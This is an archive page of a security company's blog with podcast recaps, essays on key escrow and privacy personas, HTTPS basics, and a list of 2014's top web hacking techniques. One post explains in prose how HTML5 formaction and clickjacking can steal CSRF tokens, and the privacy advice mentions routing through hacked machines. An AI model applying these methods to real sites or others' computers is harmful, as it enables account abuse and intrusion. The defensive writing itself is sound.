Category Archives: Technical Insight

#HackerKast 33: WordPress Core XSS, Spoof Email Tanks Stock, Tesla Defacement via DNS Hack, 451 Status Code, MS15-034 Microsoft Vulnerability

Hey All! Thanks for checking out this week’s HackerKast! We’re all back and recovering from RSA and my feet still hurt.

Starting off with This Week In WordPress Sucks™, we’ve got a vulnerability in WordPress core this time. This is usually not the case as core has been gone over several times with a fine toothed comb, but some persistent XSS in core comment functionality popped up anyway. Also, as per usual, a few hundred plugins were vulnerable to an XSS that was found in two different frequently used functions that were poorly documented. The core issue were patched already but it is up to administrators of WordPress installs to race and get the patch installed.

Next, in silly things that affect the stock market news, Italy’s 2nd largest bank had a hoax email go out pretending to be the CEO resigning. Within moments, the stock takes a huge crash before coming back up after everyone realizes it was a hoax. We’ve seen this before a few times, notably the time Associated Press Twitter account was hacked and tweeted about a bomb at the White House which caused the entire stock market to take a dive for a few minutes. This all points to the fact that there are automated stock trading systems out there making decisions based off of social media and news information.

We had a little chat about the recent problem over at Tesla where their homepage was “defaced”. This wasn’t actually a defacement of any servers on their end but the attackers went after the recently popular low hanging fruit of DNS providers. Once the DNS provider was owned, the homepage was redirected along with any MX records allowing emails to be rerouted to the attackers. With this email rerouting in place, they then sent out some Twitter password reset emails which allowed them to take over the social media accounts. What Robert and I touched on at the end here is that Tesla was lucky that this was all for the lulz because that email rerouting, if done correctly, could’ve been silently MiTMing the company’s emails for some time before anybody noticed. Scary stuff relying on a DNS provider with that level of severity of compromise.

A new status code is being presented in the HTTP standard for the purposes of displaying a legally related block. Instead of just a 404, the browser would now present a 451 which would mean legally restricted due to any number of reasons. Most popularly this would show up for geolocation related blocks of content that tons of Netflix users are very aware of.

Lastly, MS-15-034, came out which was a Microsoft Buffer Overflow vulnerability in IIS servers. Of course Robert couldn’t help himself and wrote a snippet of exploit code. Then in This Week In RSnake Puts Something Dangerous Social Media™ he posted this code to Twitter for people to play with exploit in a remotely exploitable way. We’re toying with a possible demo we could do of this for you all but might take some tinkering to make it interesting.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay


XSS 0day in WordPress Core
Many WordPress Plugins Found Vulnerable to XSS
Fake Email Regarding CEO Resignation Tanks Stock
Tesla’s DNS and Twitter Account Hacked
New HTTP “Legally Restricted” Status Code Proposed
MS15-034 Buffer Overflow in Microsoft HTTP pt 1.
MS15-034 Buffer Overflow in Microsoft HTTP pt 2.
MS15-034 Buffer Overflow in Microsoft HTTP pt 3.

Notable stories this week that didn’t make the cut:

Thirty Meter Telescope Gets DDoS’d
Google’s April Fools Joke Actually Made Users Less Secure
Extremely Hackable eVoting Machine
Security Expert Pulled Off Flight by FBI After Exposing Airline Security Flaws
Senate Proposes Re-classifying Certain Uses of Software/Hardware as “Fair Use” and Exempt from DMCA
Navy Announces It Will Stop Buying Manned Aircraft
“Better Presentation of URLs in Search” Should Read “Removal of URLs In Search”
“The Real Deal” DarkNet 0Day Auction

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ stand off with Admiral Mike Rogers, I got to thinking about what the Admiral must be saying when he insisted that government “front doors” were technically possible to create in a way that didn’t give them ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain to you why that is a bad idea and propose a technically less dangerous one.

Barring any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or the future where we have to provide similar access to any government that asks, there are some legitimate reasons this design is bad. First a brief primer on how split-keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password “Will”. “Will Wheaton” is a very weak password, but it’s made significantly weaker when one party knows at least half of the secret. But it gets worse. Let’s say government agency B (the FISA court) has the second half of the password “Wheaton”. Eventually they need to combine the password somewhere. That physical place is a place where both halves of the password have to be typed in at the same time. Let’s call it a SCIF for argument’s sake.

In this example the SCIF is now the one place where all secrets go, and makes it a prime target to attack. Now both parties can see the data, instead of it just being one party. There may be situations where truly only one party should see the data. If the password is always the same for every piece of encrypted information for all conversations, it practically guarantees abuse once both halves are known. Not only is it significantly easier to break the original encryption since both parties have half the key material, but it has also created a single place where two parties now have to combine their two halves and it is far more likely to be abused.

What happens when access to that user’s data is no longer deemed useful? Does the key no longer become useful? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No – that’s not how passwords or keys work when they have to work everywhere all the time. All they can do is tell Apple, or Google or whoever created the backdoor to change the user’s keys and/or create a different backdoor password to be created. That’s one of the major drawbacks of this model. It could also inadvertently tip off the suspect in the process if they notice a new key being issued as well, depending on how it was implemented.

Now let’s take a slightly different scenario where Apple/Google had a rolling window where passwords changed every day, say. One day it was “Will Wheaton” the next it was “Darth Vader” and so on. That way the FBI/NSA and the FISA courts could subpoena any piece of information but it had to be marked with a certain time period (say ten days and they would use their corresponding 10 keys split into two parts each for a grand total of 20 key-halves). That way, they only had access to certain pieces of information and only for that one conversation, and nothing after that time period. That has a better chance of being successful, but still relies on the parties to come together at some point and allows them both to see the resultant classified material.

A more useful approach would be to have four sets of keys for each time-slice of one day. Key 1 and 2 belonged to the FBI/NSA and Key 3 and 4 belonged to the FISA court. Key 1 would decrypt to a blob of further encrypted material that would only be decrypted fully by Key 3 (think of Key 1 as the outer slice of an onion and Key 3 the inner slice to get to the center). Also Key 4 would decrypt a blob of decrypted material that could only be fully decrypted by key 2. That way you could guarantee that neither individual key could be subverted to fully decrypt without the other’s involvement. It would also allow either or both to see the resultant material should they need it but not without each other’s approval. It would also guarantee that the key material wouldn’t be abused beyond the time slice for the conversation in question.

So here is how it would break down. FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and FBI/NSA request Apple/Google give them the time slice of Tuesday and Wednesday. Apple/Google respond with corresponding numbers 1234 and 1235 with corresponding blobs of encrypted text (if the FBI/NSA don’t already have it).. FBI/NSA request that FISA decrypt the blobs with Key 4(Tuesday) and Key 4(Wednesday) corresponding with conversation 1234 and 1235. FISA returns two encrypted blobs that won’t be useful until the FBI/NSA use their Key 2(Tuesday) and Key 2(Wednesday) corresponding with the time slice Tuesday and Wednesday for conversation 1234 and 1235. The FBI/NSA decrypt the final encrypted blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoena’d. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the Court also needs to see the data, corresponding keys 1 and 3 are used for the same time-slice against the corresponding blobs of data.

Of course this is a huge burden, because now each user has four keys that need to be created for each day. Assuming there are 3 billion people in the world, and they use probably 3 different types of chatting systems per day, that would require something like 36 billion keys to be shared by two government agencies (18 billion each) per day. That’s a lot. Not to mention that keys wouldn’t just be short passwords, but presumably something like x509 or GPG certs, which can be quite large. And that also assumes that they can somehow get access to those keys in a way that the other (or malicious 3rd parties) can’t intercept or see. The devil lies deep in those details.

Ultimately though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve for the technical problems we have to be extremely thoughtful on how or even if we deploy it at all. Even when one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that the idea of freedom of expression will be lost in the annals of time. We all have to decide: would we rather have security in the form of big brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: it’s the letter ’S’. The ’s’ I’m referring to is the ’S’ in HTTPS. You may never have seen the ’S’ before in your web browser, or you may have seen it and never realized it’s importance. You may know it as that thing that gets added before the website you type in. What is it’s meaning? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are referred to as ‘protocols’. In essence, these protocols are defining how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP, while others use HTTPS. If you bring up CNN’s home page you’ll notice that it either shows http in front of the URL in the URL bar or just This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data over the HTTP protocol can be intercepted and read at any point between you and the website’s computer. This is what’s known as a ‘man-in-the-middle’ (MITM). A person listening in on your virtual conversation between your computer and the website’s computer can look at all the data that’s being sent. This isn’t a big deal if you’re looking at articles on CNN or searching for content on Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. The protocol HTTPS is a way of securely sending data from your computer to the website you are interacting with. If a site is using HTTPS you’ll notice the HTTPS in front of the URL. As an example, go to In more modern and up-to-date browsers, you’ll likely see the HTTPS colored in either green or red and a lock icon. The green text with the lock icon is stating that you’re communicating securely with this website and everything looks to be going well.

If the https is red, there is probably some type of issue with the site security. It may be that the site’s certificate is out of date or invalid, or it may be that the site includes insecure third-party content, or there may be other issues. In any case, it is always safest not to proceed with a transaction that involves information you would like to keep secure if the HTTPS and lock icon are not green.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy who is performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language that’s been made up by the two people talking. Anytime you are doing anything that requires a login, credit card number, social security numbers, or ANY private data, you want to make sure that you see that HTTPS protocol, and if you have the benefit of modern browsers, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs and we were impressed to see that 87% of the respondents perform static analysis. 32% of them perform it with each major release and 13% are performing it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibly into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion and perhaps intentional fear uncertainty and doubt (FUD) in this area. The way you go about testing third party software should mirror the way you go about testing your own software. Binary analysis of software for the purpose of not exposing your Intellectual Property (IP) is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort is no problem. Tools such as ILSpy and Show My Code are freely and widely available.Sharing your binaries in an attempt to protect your Intellectual Property actually end up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options that allow for binary review that other vendors require. Or at a very minimum it requires that those same binaries never get uploaded to production where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP you need to make certain your binaries don’t fall into the wrong hands, because inside of those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on the reasons why they care and the lengths they are both willing and able to go through to protect that privacy. This is a brief run-down on some various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user can actually be embodied by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which is to say that spending time on security has a negative financial tradeoff for most of the population when taken in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself and is more concerned about usability and convenience. He feels that the more he does to protect himself, the more inconvenient life is. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He choses weak security questions. He uses password managers. He clicks through any warning he sees. He downloads all of the programs he finds regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third party testing by asking for certificates of attestation, or attempt to self-host where possible (E.g. local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software, VPNs and logs out of anything sensitive when finished. Ideally she should use a second browser for banking versus Internet activities. She shouldn’t click on links out of emails, shouldn’t install any unknown applications and even shouldn’t download trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating or seems to not look “right”, she should avoid it. It may have been hacked or taken over. She should also do reputation checking on the site using Web of Trust or similar tools. She should look for the lock in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for every software that is already on her computer, uninstall anything she doesn’t need and make sure all services are disabled that aren’t necessary. If anything looks suspicious, she should ask a more technical person for help, and make sure she has backups of everything in the case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insomuch as that it enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. Therefore, he places trust in poor places, mistakenly thinking he is somehow protected by geography or rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, like ad-blocking software like Disconnect or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key that no one has ever used posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone and still uses third party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed and his social media is easily crawled/monitored. Also, his whereabouts are always monitored in several different ways through his phone and social media. He is at risk of putting people’s lives in danger due to how he operates. He needs to have complete isolation and compartmentalization of his two lives. Meaning, his work computer and personal email/social presence should not intertwine. All sensitive stuff should be done through anonymous networks, and using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones and he should be avoiding any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of her friends and family around her are at risk because of what she is working on. She cannot rely on anyone she knows to help her because it will put them and ultimately, herself, in the process. She is well read on all topics of Internet security and privacy and she takes absolutely every last precaution to protect her identity.
  • Advice for Eve: Eve needs to got to incredible lengths to use false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect into wifi at distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should be using plausible deniability (E.g. VeraCrypt) and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped down version of Tails, running various plugins that ensure that her browser is incapable of doing her harm. That includes plugins like NoScript, Request Policy, HTTPS Everywhere, etc. She should never go to the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash and barter/trade. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits, and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted due to voice-prints and phone-line/background noise forensics. All of her IDs should be put into a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or surroundings, and never talk to anyone she knows personally while surfing online. She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is the fact that we tend to give generic one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect but it never could be. People’s backgrounds are so diverse and varied, that it would be impossible to precisely fit any one person into any bucket. Therefore privacy advice must be tailored to people’s ability to understand their interest in protecting themselves and the actual threat they’re facing.

Also, we often are talking at odds with regards to privacy vs security. Even if we didn’t have to worry about the intentions of those giving advice, as discussed in that video, we still can’t rely on the advice itself necessarily. Nor can we rely on the advice being well taken by the person we are giving it to. One party might fully believe that they’re doing all they need to be doing, while they are in fact making it extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs/interest/abilities with regards to privacy – age, sex, race, religion, cultural differences, philosophies, their location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice it is guaranteed to be a bad fit for most people.

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even if it is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack from HTML injection.

For example, let’s say you have a site that has CSP set up to prevent inline and remote JavaScript from loading using the nonce feature, which requires all script tags to include the nonce before they will load. The nonce is probably based on some locally known secret XOR’d with the user’s credential or something similar. Whatever the case the CSP nonce is not known. But what they really want to do is submit some form. Now the form itself might protect itself in a different way, using a server-generated nonce (a second one) to prevent cross site request forgeries. Barring any side channel attacks, MitM attacks or attacks against the server itself, it seems like this might stop you in your tracks.

HTML5 to the rescue! Let’s say the form has an id set of id=”form1″. HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can say that it belongs to any form using the “form” parameter (e.g. form=”form1”). That might be somewhat bad, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has a feature called formaction. Formaction allows me to change the location where the form is being submitted.

So if the attacker submits an input field that associates itself with the form that contains the secret nonce and also with the formaction directive which points the form to the attacker’s website, it’s pretty much game over if the user clicks on that button. So now the trick is to get the attacker to click on the button. Oh, if only there was a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!

So if the site is using CSP but not using X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click on the evil button that has set a formaction which points the form back to the attacker’s site. The attacker then takes that nonce, creates a page that automatically uses the nonces and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).

Scriptless attacks aren’t new, Mario Heiderich for example has been working on them for years, but they are deadly. It’s not quite the same thing as a cross domain read in this case, but it has the same effect – allowing the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages. But that only stops one form of the attack. It’s still possible to social engineer people and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me and why they need to change the form action after the fact — even overriding the original location — is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP to block formaction, but you have to do that or the attack will still work with other CSP rules. Also you can do the equivalent of X-Frame-Options in CSP as well. So a properly configured CSP might actually save you – very cool!

Security and the SDLC: Integrating application security in developer environments

As we wind down the end of the year, I thought it would be good to talk about some big thinking in regard to vuln classification and prioritization. There are two common overlooked issues when enterprises attempt to secure themselves:

1. Once a company finds out about a vulnerability, how do they track it? A company can end up with tens of thousands of vulnerabilities or more if their environment is large and complex enough. And we’re not talking about false positives – I mean real, remotely exploitable vulns.
2. How do you ensure the vulnerabilities actually get fixed? Just because you find a vulnerability doesn’t mean your developers know about it, or know to prioritize it, etc. And what if they just claim that it’s fixed…?

The problem is scale. Any off the shelf scanner will work fine when you’re talking about one app, or a few apps. But where they fall down is when they have to scan hundreds or thousands of apps. Not only do companies not have the manpower to manage all of those scans, and the associated credentials, but even if they did, they’re left with a huge homework assignment – transcribing thousands of vulns into some system that the developers know to look at.

Integration with some sort of case management system, therefore, is a critical component of SDLC (software/security development life cycle) integration. It’s not just a nice-to-have checklist item – if you aren’t doing it, vulns are getting lost, and that’s just a fact. Worse yet, if you don’t have bi-directional communication, vulns can get closed and then you’ll end up opening a new ticket every time you scan. Knowing which vuln corresponds to scanner findings allows you to see when a developer just wants to close a few tickets before 5PM on Friday. When the vulns all re-open on the next scan-run you’ll know who is just trying to game the system and therefore which developer/QA engineers are leaving you unnecessarily vulnerable.

Then you have the whole issue of vuln priority. Without knowing something about the systems in question you could inadvertently prioritize a vuln on an internal device ahead of something that is in production. Scanners are ultimately dumb (yes, it’s true, no matter how much we like to pretend they’re not) and they need to be told how to think about the environment. If your scanner can’t take in information from systems like Archer or similar GRC (Governance Risk Compliance) tools, to know how important a site is, it’s entirely possible that you’re fixing the wrong issues in the wrong order. It’s putting your company unnecessarily at risk and wasting resources in the process.

There is a real art to making sure you are looking at the correct vulns. The more you think about it, the more you’ll probably agree this is the right path forward – adding in all sorts of additional/useful criteria. For instance, knowing how much a site is getting attacked is useful. Knowing which sites take and store PII (personally identifiable information) is useful. Knowing which sites live in the DMZ (de-militarized zone) together is useful. All of those things can help you prioritize and stop wasting time on vulns that either don’t matter because they’re nearly impossible to exploit or are less critical because they are protected by other controls.

There’s obviously a lot more to it, but this should be a good primer on how to start thinking about vulns. If you want more information, we have several webinars that go into this in more gory detail. Either way, if you aren’t spending time identifying your assets and prioritizing them, you’re wasting time and money – and who’s got that?

Top 10 Web Hacking Techniques of 2014

UPDATE – 3/19, 11:00 a.m PT We have our Top 10 list folks! After weeks of coordination, research, voting by the community and judging by our esteemed panelists, we are pleased to announce our Top 10 List of Web Hacking Techniques for 2014:

  1. Heartbleed
  2. ShellShock
  3. Poodle
  4. Rosetta Flash
  5. Residential Gateway “Misfortune Cookie”
  6. Hacking PayPal Accounts with 1 Click
  7. Google Two-Factor Authentication Bypass
  8. Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
  9. Facebook hosted DDOS with notes app
  10. Covert Timing Channels based on HTTP Cache Headers

Congratulations to all those that made the list! Your research contributions are admired and should be respected. And a special thanks to everyone that voted or shared feedback. Also, for anyone that would be interested in learning more about this list, Johnathan Kuskos and I will be presenting the list at RSA in San Francisco next month. Come check it out!

Agree with the list? Disagree? Share your comments below.

Every year the security community produces a stunning number of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, we are solely focused on new and creative methods of Web-based attack. Now in its ninth year, the Top 10 Web Hacking Techniques list encourages information sharing, provides a centralized knowledge base, and recognizes researchers who contribute excellent work. Past Top 10s and the number of new attack techniques discovered in each year:

2006 (65), 2007 (83), 2008 (70), 2009 (82), 2010 (69), 2011 (51), 2012 (56) and 2013 (31).

Phase 1: Open community submissions [Jan 7-Jan 30]
Comment this post with your submissions from now until Jan 30. The submissions will be reviewed and verified.

Phase 2: Open community voting for the final 15 [Feb 2-Feb 20]
Each verified attack technique will be added to a survey which will be linked below on Feb 2. The survey will remain open until Feb 20. Each attack technique (listed alphabetically) receives points depending on how high the entry is ranked in each ballot. For example, an entry in position #1 will be given 15 points, position #2 will get 14 points, position #3 gets 13 points, and so on down to 1 point. At the end all points from all ballots will be tabulated to ascertain the top 15 overall.

Click here to vote for your favorite web hacks of the year! ***CLOSED***

Phase 3: Panel of Security Experts Voting [Feb 23-Mar 19]

From the result of the open community voting, the final 15 Web Hacking Techniques will be ranked based on votes by a panel of security experts. (Panel to be announced soon!) Using the exact same voting process as Phase 2, the judges will rank the final 15 based on novelty, impact, and overall pervasiveness. Once tabulation is completed, we’ll have the Top 10 Web Hacking Techniques of 2014!

Prizes [to be announced]

The winner of this year’s top 10 will receive a prize!

Ongoing List of 2014 Hacks (in no particular order)
TweetDeck XSS
OpenSSL CVE-2014-0224
Rosetta Flash
Unauthenticated Backup and Password Disclosure In HandsomeWeb SOS Webpages cve-2014-3445
CTA: The weaknesses in client side xss filtering targeting Chrome’s XSS Auditor
Advanced Exploitation of Mozilla Firefox Use-After-Free Vulnerability (Pwn2Own 2014) CVE-2014-1512
Facebook hosted DDOS with notes app
The Web Never Forgets: Persistent Tracking Mechanisms in the Wild
Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)
The PayPal 2FA Bypass
AIR Flash RCE from PWN2OWN
PXSS on long length videos to DOS
MSIE Flash 0day targeting french aerospace
Linskys E420 Authentication Bypass Disclosure
Paypal Manager Account Hijack
Covert Redirect Vulnerability Related to OAuth 2.0 and OpenID
How I hacked Instagram to see your private photos
How I hacked GitHub again
Residential Gateway “Misfortune Cookie”
Recursive DNS Resolver (DOS)
Belkin Buffer Overflow via Web
Google User De-Anonymization
Soaksoak WordPress Malware
Hacking PayPal Accounts with 1 Click
Same Origin Bypass in Adobe Reader CVE-2014-8453
HikaShop Object Injection
Covert Timing Channels based on HTTP Cache Headers
Bypassing NoCAPTHCA
Delta Boarding Pass Spoofing
Cryptophp Backdoor
Microsoft SChannel Vulnerability
Google Two-Factor Authentication Bypass
Drupal 7 Core SQLi
Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
Reflected File Download
Misfortune Cookie – TR-069 ACS Vulnerabilities in residential gateway routers
Hostile Subdomain Takeover using Heroku/Github/Desk + more: Example 1 and Example 2
File Name Enumeration in Rails
Canadian Beacon
setTimeout Clickjacking

Click here to vote for your favorite web hacks of the year! ***CLOSED***

Final 15 (in no particular order):
AIR Flash RCE from PWN2OWN
Belkin Buffer Overflow via Web
Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
Advanced Exploitation of Mozilla Firefox Use-After-Free Vulnerability (Pwn2Own 2014) CVE-2014-1512
Covert Timing Channels based on HTTP Cache Headers
Canadian Beacon
Cryptophp Backdoor
Hacking PayPal Accounts with 1 Click
Google Two-Factor Authentication Bypass
Facebook hosted DDOS with notes app
Rosetta Flash
Residential Gateway “Misfortune Cookie”

#HackerKast 27: SXSW, Copy Magic Paste, Tinder AI, GTA V, Mystery SSL Fix

Hey everybody! Quick recap this week as we are gearing up for the Top 10 Web Hacks Webinar (Which you can register to watch here)

Robert and I just got back from SXSW this weekend and that was a very interesting experience. My first big trade show floor that wasn’t security related. Tons of interesting stuff floating around Austin this week!

First story we covered was about a Copy Magic Paste trick that Robert found from the SEO crowd. This idea started as a way for websites to force citation for people stealing content but Robert was talking about the possibility of utilizing this to sneak javascript in places.

Next, I touched on a fun Tinder story from SXSW where a movie about AI used a robot Tinder profile to match with people at the conference and after a short conversation the bot would point the person they tricked towards an Instagram promoting the movie. This brought up a lot of topics related to AI that were floating around the conference which Robert has a ton to say about.

A quick fun logic flaw in GTA V wound up with some real $ consequences. Jer and I love logic flaws, they feel like hacking without hacking. This was a pretty simple, make an in game car for a few thousand in game dollars and sell it for about 10x that. The writers of this article did the conversion on how much money real world this would turn into and it seemed people could make about $5 every 20 minutes. If this could be automated it would’ve been some nice passive income.

Jer talked about a new exciting story that we are all very hopeful about, Yahoo Mail end to end encryption. Alex Stamos, CISO over at Yahoo, announced a new program to use end to end encryption in their webmail client. The big question here is how usable this will be. If it is as usable as PGP, we probably won’t see a huge uptick in adoption. We’ll be watching this closely as it has huge potential.

Lastly we touched on a “mystery” SSL fix from the OpenSSL community. A mailing list announcement mentioned some new version patches coming out that fix a high severity vulnerability. We don’t have much detail here but once we do know, it will be pretty interesting. In the wake of Heartbleed, we are all a bit nervous when OpenSSL is mentioned in the context of vulnerabilities.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Copy Magic Paste Modifies Copy Event on your Website
Tinder Users at SXSW Are Falling For a Robot
